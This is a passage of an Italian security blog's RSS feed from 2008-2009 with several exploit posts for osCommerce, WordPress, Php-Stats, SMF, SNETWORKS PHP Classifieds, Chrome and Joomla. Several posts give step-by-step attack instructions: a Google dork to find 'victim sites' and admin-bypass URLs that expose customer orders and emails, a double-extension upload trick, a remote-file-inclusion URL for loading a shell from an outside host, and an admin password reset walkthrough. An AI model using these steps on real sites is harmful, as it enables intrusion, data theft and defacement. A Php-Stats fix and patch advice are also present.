<p>A questo punto si avrà una <strong>shell</strong> sul sito e si potra effettuare qualsiasi azione sia consentita all&#8217;utente web del sito vittima.</p>
<p>Come detto all&#8217;inzio dell&#8217;articolo provvedete sempre ad aggiornare alle ultime release le vostre applicazioni web! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability pics" /> </p>
<p><br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT - POC] &#8211; osCommerce 2.2 RC2 Authentication Bypass</title>
		<link>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html</link>
		<comments>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html#comments</comments>
		<pubDate>Wed, 18 Nov 2009 20:28:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[osCommerce 2.2 RC2]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=342</guid>
		<description><![CDATA[Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova vulnerabilità per il noto ma allo stesso tempo abbandonato osCommerce RC 2.2 che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password. Come potrete verificare personalmente tramite questo Proof Of Concept basterà richiamare l&#8217;url dell&#8217;Area Admin con una [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce.gif" rel="lightbox[342]" title="osCommerce"><img class="alignleft size-thumbnail wp-image-343" title="osCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/oscommerce-150x60.gif" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="60" /></a>Lo scorso 13 Novembre Stuart Udall ha segnalato una nuova <strong>vulnerabilità</strong> per il noto ma allo stesso tempo abbandonato <strong>osCommerce RC 2.2</strong> che consente di accedere ad alcune sezioni dell&#8217;Area Amministrativa senza aver bisogno di alcuna login e password.</p>
<p>Come potrete verificare personalmente tramite questo <strong>Proof Of Concept</strong> basterà richiamare l&#8217;url dell&#8217;Area Admin con una particolare sintassi e il gioco è fatto e <strong>si potranno visionare gli ordini, i clienti, le email</strong>.</p>
<p>Già verso agosto fu scoperta una grave falla nel meccanismo di autenticazione che consentiva, tramite opportune interrogazioni HTTP (http request) di <strong>eseguire comandi lato server</strong> e, sfruttando alcuni file dell&#8217;osCommerce stesso,  di uploadare file, shell etc.</p>
<p>Per maggiori informazioni circa questa vulnerabilità andate a questo <a href="http://secunia.com/advisories/33446/" target="_blank"><strong>link</strong></a>.</p>
<p>Per quanto riguarda la falla di cui vi parlo oggi vi illustro di seguito come sfruttarla e quali informazioni si possono ottenere. Per prima cosa è necessario trovare un &#8220;<strong>sito vittima</strong>&#8220;  e per fare questo ci viene incontro, ancora una volta, <a href="http://www.google.com/" target="_blank"><strong>Google</strong></a>!</p>
<p><span id="more-342"></span>Cercate su Google la seguente stringa:</p>
<p><cite>&#8220;Powered by OsCommerce&#8221;</cite></p>
<p>(compresa di virgolette)</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search.PNG" rel="lightbox[342]" title="Dork OsCommerce"><img class="size-thumbnail wp-image-344 aligncenter" title="Dork OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/google_search-150x68.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="68" /></a></p>
<p>In questo modo il Motore di Ricerca ci mostrerà solo i siti che contengono esattamente quella frase e, quindi, con molta probabilità siti basati su <strong>OsCommerce</strong>.</p>
<p>A questo punto aprite qualche sito e verificate se richiamando l&#8217;area &#8220;admin&#8221; vi viene mostrata correttamente la pagina di login.</p>
<p>L&#8217;area admin di default è raggiungibile al seguente url:</p>
<p><cite>http://&lt;dominio_con_oscommerce&gt;/admin</cite></p>
<p>Se l&#8217;Admin non ha cambiato il nome della cartella vi apparirà una schermata simile a questa.</p>
<p style="text-align: center;"><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce.PNG" rel="lightbox[342]" title="Admin Login OsCommerce"><img class="size-thumbnail wp-image-345 aligncenter" title="Admin Login OsCommerce" src="http://www.capn3m0.org/wp-content/uploads/2009/11/adminoscommerce-150x150.PNG" alt="[EXPLOIT   POC]   osCommerce 2.2 RC2 Authentication Bypass" width="150" height="150" /></a></p>
<p>A questo punto si sfrutterà la vulnerabilità nell&#8217;autenticazione per <strong>bypassarla</strong> semplicemente digitando i seguenti url:</p>
<p>/admin/orders.php/login.php<br />
 /admin/mail.php/login.php<br />
 /admin/mail.php/login.php?fooled<br />
 /admin/mail.php/login.php?action=send_email_to_user</p>
<p>Cosa succede richiamando questi url? (a voi scoprirlo!)</p>
<p>Si accederà in visualizzazione alle funzionalità di quei file e quindi, nell&#8217;esempio citato sopra, <strong>si potranno leggere gli ordini e vedere i clienti con le relative email</strong>.</p>
<p>Questo articolo è solamente un Proof Of Concept e pertanto non deve portare ad alcuna azione malevola.</p>
<p>Per chi utilizza <strong>OsCommerce</strong> consiglio o di valutare il passaggio a tutt&#8217;altro applicativo, visto anche che il progetto è ormai fermo, oppure di andare sul Forum di OsCommerce dove suggeriscono una semplice ma efficace (?) fix al problema.</p>
<p>Link correlati:</p>
<p><strong><a href="http://seclists.org/fulldisclosure/2009/Nov/169" target="_blank">OS Commerce authentication bypass by Stuart Udall</a></strong></p>
<p><a href="http://forums.oscommerce.com/topic/348589-serious-hole-found-in-oscommerce" target="_blank"><strong>Post dal Forum di OsCommerce</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; WordPress </title>
		<link>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html</link>
		<comments>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html#comments</comments>
		<pubDate>Sat, 14 Nov 2009 16:24:46 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=337</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock.png" rel="lightbox[337]" title="WordPress File Arbitrary Upload"><img class="alignleft size-thumbnail wp-image-338" title="WordPress File Arbitrary Upload" src="http://www.capn3m0.org/wp-content/uploads/2009/11/broken-wordpress-lock-150x150.png" alt="[EXPLOIT]   Wordpress <= 2.8.5 Arbitrary File Upload" width="150" height="150" /></a>Ieri avevo dato <a href="http://www.capn3m0.org/rilasciato-wordpress-2.8.6-per-correggere-2-falle-di-sicurezza.html" target="_self">notizia</a> del rilascio della versione<strong> 2.8.6 di WordPress</strong> che risolveva due falle di <strong>sicurezza</strong>.</p>
<p>La notizia non era molto dettagliata poiché la <strong>vulnerabilità</strong> era stata annunciata molto genericamente come una vulnerabilità che permetteva di &#8220;<strong>aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache&#8221;.</strong> Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e <strong>Proof of Concept</strong>.</p>
<p>In realtà la vulnerabilità <strong>permette di uploadare file bypassando il controllo</strong> della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. <strong>Affligge tutte le versioni inferiori alla 2.8.5</strong> (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.</p>
<p><span id="more-337"></span>
<p>La notizia era stata pubblicata l&#8217;11 Novembre scorso nella nota Mailing List <a href="http://seclists.org/fulldisclosure" target="_blank"><strong>Full Disclosure</strong></a> dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo <a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">link</a>. Praticamente spiega che la verifica del file uploadato avviene confrontando l&#8217;estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.</p>
<p>La Regular Expression, però, unita al fatto che i WebServer <a href="http://apache.org/" target="_blank"><strong>Apache</strong></a> (solamente in una particolare configurazione spiegata <a href="http://seclists.org/fulldisclosure/2009/Nov/152" target="_blank"><strong>qui</strong></a>) consentono di creare file nel formato</p>
<p>
<blockquote>filename.ext1.ext2</p></blockquote>
<p>può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:</p>
<blockquote><p>phpinfo.php.jpg</p>
</blockquote>
<p>In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l&#8217;estensione &#8220;.jpg&#8221; e successivamente, verificandola con l&#8217;Array dei Mime Types ammessi, <strong>permetterebbe al file di essere uploadato scambiandolo per un&#8217;immagine</strong>.</p>
<p>Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:</p>
<blockquote><p>http:///wp-content/uploads/2009//phpinfo.php.jpg</p>
</blockquote>
<p>Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto <strong>che chi attaca deve essere un membro dello staff con privilegi di pubblicazione</strong> come era stato annunciato in occasione della 2.8.6.</p>
<p>Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.</p>
<p>Eccovi alcuni link correlati:</p>
<p><a href="http://seclists.org/fulldisclosure/2009/Nov/141" target="_blank">Proof Of Concepts &#8211; WordPress &lt;= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski</a></p>
<p><a href="http://www.vupen.com/english/advisories/2009/3234" target="_blank">Vupen &#8211; WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities</a></p>
<p><a href="http://www.securityfocus.com/bid/37014/info" target="_blank">SecurityFocus &#8211; <span>WordPress Unspecified Cross Site Scripting Vulnerability</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-wordpress-arbitrary-file-upload.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT/FIX] Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit</title>
		<link>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html</link>
		<comments>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html#comments</comments>
		<pubDate>Sat, 11 Oct 2008 23:20:51 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[code execution]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Milworm]]></category>
		<category><![CDATA[php stats]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=98</guid>
		<description><![CDATA[In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog). Le vulnerabilità sono di due tipi: Blind SQL Injection e [...]]]></description>
			<content:encoded><![CDATA[<p>In questi giorni sto lavorando ad un &#8220;caso&#8221; di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche <a href="http://php-stats.com/" target="_blank"><strong>Php-Stats 0.1.9.2</strong></a> (utilizzato anche in questo Blog).</p>
<p><span id="more-98"></span></p>
<p>Le vulnerabilità sono di due tipi: <a href="http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_Injection" target="_blank"><strong>Blind SQL Injection</strong></a> e <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution" target="_blank"><strong>Remote Code Execution</strong></a>.</p>
<p>Tale vulnerabilità è stata riportata da <a href="http://www.milw0rm.com" target="_blank"><strong>Milworm</strong></a> e <a href="http://www.milw0rm.com/exploits/4513" target="_blank"><strong>questo</strong></a> è l&#8217;indirizzo dell&#8217;Exploit.</p>
<p><a href="mailto:n0b0d13s@gmail.com "><strong>Egix</strong></a>, lo scopritore di tale vulnerabilità riporta anche un fix da applicare al file &#8220;<strong>php-stats.recjs.php</strong>&#8221; al fine di correggere tale falla di sicurezza.</p>
<p>Per fixare il vostro <strong>Php-Stats</strong> aprite il file &#8220;<strong>php-stats.recjs.php</strong>&#8221; e posizionatevi alla <strong>Riga 94</strong>. Troverete il seguente codice:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=urldecode($_GET['ip']); else break;</strong></p>
</blockquote>
<p>che andrà sostituito con questo:</p>
<blockquote><p><strong>if(isset($_GET['ip'])) $ip=intval(urldecode($_GET['ip'])); else break;</strong></p>
</blockquote>
<p>Come sempre eccovi il file già fixato:</p>
<p><strong><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/php-statsrecjs.rar">Fix Php-Stats 0.1.9.2</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploitfix-php-stats-0192-multiple-vulnerabilities-exploit.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html#comments</comments>
		<pubDate>Sun, 05 Oct 2008 00:05:59 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[simple machine forum]]></category>
		<category><![CDATA[smf]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[WHK]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=96</guid>
		<description><![CDATA[E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc. Questo l&#8217;Exploit pubblicato su Milw0rm: Name: SMF 1.1.6 Filter [...]]]></description>
			<content:encoded><![CDATA[<p>E&#8217; stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione <strong>1.1.6</strong> di <strong><a href="http://www.simplemachines.org/" target="_blank">Simple Machine Forum</a> (o SMF)</strong> che permette di <strong>bypassare</strong> il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.</p>
<p><span id="more-96"></span></p>
<p><a href="http://www.milw0rm.com/exploits/6665" target="_blank">Questo</a> l&#8217;Exploit pubblicato su <a href="http://www.milw0rm.com/" target="_blank"><strong>Milw0rm</strong></a>:</p>
<blockquote><p>Name: SMF 1.1.6 Filter Post Bypass<br />
 Author: WHK<br />
 WebSite: http://www.jccharry.com/</p>
<p>en{<br />
 The data in a post are not filtered properly when someone enters<br />
 statements BBCode wrong without content that a user can enter<br />
 words banned by the system of restrictions by allowing expose<br />
 SPAM content, and so on.<br />
 }</p>
<p>es{<br />
 Los datos en un post no son filtrados adecuadamente cuando alguien<br />
 ingresa declaraciones bbcode sin contenido probocando que un<br />
 usuario pueda ingresar palabras prohibidas por el sistema de<br />
 restricciones permitiendo exponer contenido SPAM, etc.<br />
 }</p>
<p>Example of a post / Ejemplo de un post:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
 [color=red][size=20pt]Fu[url][/url]ck you admin![/size][/color]</p>
<p>My SPAM: [b]ht[b][/b]tp://www.jc[i][/i]charry.com/[/b] &gt;:D<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Demo:</p>
<p>http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png</p>
<p># milw0rm.com [2008-10-04]</p>
</blockquote>
<p>Viene spiegato che &#8220;<em>&#8230;i dati in un post non vengono filtrati correttamente quando vengono inseriti alcuni tag BBCode errati permettendo così di inserire parole (o tutto ciò che è ritenuto SPAM) bypassando il Filtro AntiSpam..</em>&#8220;.</p>
<p>L&#8217;autore dell&#8217;exploit, tale <a href="http://www.jccharry.com/ " target="_blank"><strong>WHK</strong></a>, allega poi l&#8217;immagine seguente dove riporta sia il metodo con cui ha inserito il testo ed i BBcode nel Post, sia il risultato finale.</p>
<div id="attachment_97" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass.png" rel="lightbox[96]" title="smf_filter_post_bypass"><img class="size-medium wp-image-97" title="smf_filter_post_bypass" src="http://www.capn3m0.org/wp-content/uploads/2008/10/smf_filter_post_bypass-300x248.png" alt="[VULN/EXPLOIT] SMF 1.1.6 Filter Post Bypass   Milw0rm" width="300" height="248" /></a><p class="wp-caption-text">Esempio pubblicato dall&#39;autore</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-exploit-smf-116-filter-post-bypass-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] SNETWORKS PHP CLASSIFIEDS 5.0 &#8211; RFI</title>
		<link>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html</link>
		<comments>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html#comments</comments>
		<pubDate>Sat, 04 Oct 2008 13:27:26 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[PHP CLASSIFIEDS]]></category>
		<category><![CDATA[remote file inclusion]]></category>
		<category><![CDATA[Rfi]]></category>
		<category><![CDATA[SNETWORKS]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=95</guid>
		<description><![CDATA[Oggi facendo il mio lavoro sono incappato in un sito con installato lo script &#8220;SNETWORKS PHP CLASSIFIEDS&#8221; constatando che è vulnerabile a diversi tipi di hacking. Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate [...]]]></description>
			<content:encoded><![CDATA[<p>Oggi facendo il mio lavoro sono incappato in un sito con installato lo script &#8220;<strong><a href="http://www.craigslistclone.info/" target="_blank">SNETWORKS PHP CLASSIFIEDS</a></strong>&#8221; constatando che è vulnerabile a diversi tipi di hacking.</p>
<p>Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la <a href="http://it.wikipedia.org/wiki/Remote_File_Inclusion" target="_blank"><strong>Remote File Inclusion</strong></a> utilizzata che, comunque, si trova facilmente cercando in Rete:</p>
<blockquote><p><strong>http://[Taget]/[Path]/config.inc.php?path_escape=&lt;url che volete includere&gt;?</strong></p>
</blockquote>
<p><span id="more-95"></span></p>
<p>Dalle mie verifiche ho riscontrato che il file che viene ricercato nell&#8217;Url specificato è &#8220;<strong>ipblock.inc.php</strong>&#8221; e, quindi, se volete includere una shell o simili vi consiglio di chiamare il file in tale modo e inserire l&#8217;Url dell Rfi senza specificare il file.</p>
<p>Se, quindi, avete il file nel sito &#8220;http://www.miosito.it/shell/ipblock.inc.php&#8221; l&#8217;Url per la Remote File Inclusion sarà:</p>
<blockquote><p><strong>http://[Taget]/[Path]/config.inc.php?path_escape=http://www.miosito.it/shell/</strong></p>
</blockquote>
<p>A <a href="http://www.frsirt.com/english/advisories/2008/0053" target="_blank">questo link</a> potete leggere la Vulnerabilità descritta dal sito <a href="http://www.frsirt.com/" target="_blank"><strong>FrSIRT</strong></a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-snetworks-php-classifieds-50-rfi.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Google Chrome Browser &#8211; Milw0rm</title>
		<link>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html</link>
		<comments>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html#comments</comments>
		<pubDate>Thu, 25 Sep 2008 00:09:04 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[crash]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[milw0rm]]></category>
		<category><![CDATA[screenshot]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[taskmanager]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=58</guid>
		<description><![CDATA[Vi segnalo un&#8217;exploit che è stato pubblicato oggi sull&#8217;autorevole sito Milw0rm riguado il noto Browser Google Chrome che, tengo a precisare, è ancora in versione Beta. Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome [...]]]></description>
			<content:encoded><![CDATA[<p>Vi segnalo un&#8217;<a href="http://www.milw0rm.com/exploits/6554" target="_blank">exploit</a> che è stato pubblicato oggi sull&#8217;autorevole sito <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a> riguado il noto Browser <a href="http://www.google.com/chrome" target="_blank">Google Chrome</a> che, tengo a precisare, è ancora in versione Beta.</p>
<p>Tale Exploit è un <a href="http://it.wikipedia.org/wiki/Denial_of_service" target="_blank">DoS</a> <a href="http://it.wikipedia.org/wiki/Proof_of_concept" target="_blank">PoC (Proof Of Concept)</a> che sfruttando la funzione &#8220;alert&#8221; del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell&#8217;applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.</p>
<p>Per chi volesse testarlo sulla propria pelle ecco l&#8217;Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  ):</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/chrome-6554.rar">Exploit Google Chrome &#8211; Milw0rm 6554</a></p>
<p>Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.</p>
<div id="attachment_60" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/3.jpg" rel="lightbox[58]" title="Google Chrome Normal Activity - TaskManager"><img class="size-medium wp-image-60" title="Google Chrome Normal Activity - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/3-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Stato del TaskManager di Chrome appena avviato</p></div>
<p>Dopo 15 secondi la situazione era questa:</p>
<p><span id="more-58"></span></p>
<div id="attachment_61" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/5.jpg" rel="lightbox[58]" title="Google Chrome DoS dopo 15 sec - TaskManager"><img class="size-medium wp-image-61" title="Google Chrome DoS dopo 15 sec - TaskManager" src="http://www.capn3m0.org/wp-content/uploads/2008/09/5-300x192.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="192" /></a><p class="wp-caption-text">Lo stato della memoria dal TaskManager di Google Chrome dopo circa 15 secondi dal caricamento dell&#39;Exploit</p></div>
<p>Aspettando qualche minuto la memoria Ram del proprio Pc sarà satura e Google Chrome andrà in errore<br class="spacer_" /></p>
<div id="attachment_62" class="wp-caption alignnone" style="width: 310px"><a href="http://www.capn3m0.org/wp-content/uploads/2008/09/6.jpg" rel="lightbox[58]" title="Google Chrome Crash"><img class="size-medium wp-image-62" title="Google Chrome Crash" src="http://www.capn3m0.org/wp-content/uploads/2008/09/6-300x207.jpg" alt="[EXPLOIT] Google Chrome Browser   Milw0rm" width="300" height="208" /></a><p class="wp-caption-text">Il risultato di poco più di un minuto di attività dell&#39;Exploit</p></div>
<p>L&#8217;unica cosa che mi permetto di osservare è che durante la navigazione, se si incappa in un sito contenente tale Exploit, potrebbe capitare di non accorgersi di quanto sta accadendo poiché, mentre Mozilla FireFox segnala e blocca l&#8217;apertura del Popup, in Google Chrome appare una barra in basso che, a mio avviso, non si nota particolarmente.</p>
<p>Rimango fiducioso verso gli Sviluppatori Google e come detto all&#8217;apertura di questo articolo tengo a sottolineare che stiamo parlando di una versione Beta. Penso che in occasione della primea Release Stabile questo genere di errori e falle saranno risolte a vantaggio di un nuovo concetto di Browser  <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_biggrin.gif' alt="[EXPLOIT] Google Chrome Browser   Milw0rm" class='wp-smiley' title="[EXPLOIT] Google Chrome Browser   Milw0rm pics" />  <br class="spacer_" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/google-chrome-browser-exploit-milw0rm.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] Joomla 1.5.x Remote Admin Password Change</title>
		<link>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html</link>
		<comments>http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html#comments</comments>
		<pubDate>Sun, 14 Sep 2008 16:26:35 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5 vulnerabilities]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[script php cms]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/2008/09/joomla-15x-remote-admin-password-change/</guid>
		<description><![CDATA[In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili. Al link seguente troverete l&#8217;annuncio ufficiale: http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html Questo, invece, quello dal Sito [...]]]></description>
			<content:encoded><![CDATA[<p>In data 12 Agosto è stata scoperta una vulnerabilità del Cms Joomla versioni inferiori alla 1.5.6 che consente di sfruttare il componente &#8220;com_user&#8221; per editare a proprio piacimento la password di Administrator e, quindi, di sfruttare l&#8217;accesso Admin per eseguire defacement e simili.</p>
<p>Al link seguente troverete l&#8217;annuncio ufficiale:</p>
<p><a href="http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html" target="_blank">http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html</a></p>
<p>Questo, invece, quello dal Sito Italiano:</p>
<p><a href="http://www.joomlaitalia.com/content/view/323/90/" target="_blank">http://www.joomlaitalia.com/content/view/323/90/</a></p>
<p><span id="more-3"></span>Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:</p>
<p>1) Una volta individuato il Sito in Joomla caricare questo Url:</p>
<blockquote><p>/index.php?option=com_user&amp;view=reset&amp;layout=confirm</p>
</blockquote>
<p>2) A questo punto apparirà un form che chiederà l&#8217;inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail</p>
